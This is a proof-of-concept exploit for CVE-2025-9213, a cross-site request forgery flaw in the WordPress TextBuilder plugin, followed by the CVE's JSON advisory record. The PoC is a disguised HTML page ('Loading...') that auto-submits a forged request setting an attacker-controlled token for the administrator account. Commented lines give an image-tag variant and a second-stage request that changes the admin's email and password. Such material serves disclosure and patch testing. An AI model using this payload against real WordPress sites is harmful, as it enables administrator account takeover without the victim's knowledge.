CVE-2025-9213

<!-- CVE-2025-9213 PoC - CSRF in WordPress TextBuilder Plugin handleToken function --> <!-- This PoC demonstrates how an attacker can exploit the missing nonce validation --> <!-- in the handleToken function to update a user's authorization token --> <!DOCTYPE html> <html> <head> <title>Loading...</title> </head> <body> <!-- Auto-submit CSRF form to update authorization token --> <form id="csrf-form" action="http://target-wordpress-site.com/wp-admin/admin-ajax.php" method="POST"> <input type="hidden" name="action" value="handleToken" /> <input type="hidden" name="token" value="attacker_controlled_token_value" /> <input type="hidden" name="user_id" value="1" /> <!-- Missing nonce field - this is the vulnerability --> </form> <script> document.getElementById('csrf-form').submit(); </script> <!-- Alternative: Image-based CSRF for GET requests --> <!-- <img src="http://target-wordpress-site.com/wp-admin/admin.php?action=handleToken&token=attacker_token&user_id=1" style="display:none" /> --> </body> </html> <!-- After token is updated, attacker can use the following to change password/email --> <!-- This would be a second-stage request exploiting the updated token --> <!-- POST /wp-admin/admin-ajax.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded action=update_user_profile&user_id=1&[email protected]&new_password=hacked123&token=attacker_controlled_token_value -->

{"cve": {"id": "CVE-2025-9213", "sourceIdentifier": "[email protected]", "published": "2025-10-03T12:15:47.590", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The TextBuilder plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions 1.0.0 to 1.1.1. This is due to missing or incorrect nonce validation on the 'handleToken' function. This makes it possible for unauthenticated attackers to update a user's authorization token via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. Once the token is updated, an attacker can update the user's password and email address."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3371346/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/0153fb37-788e-42f2-9dfa-76418decf1f3?source=cve", "source": "[email protected]"}]}}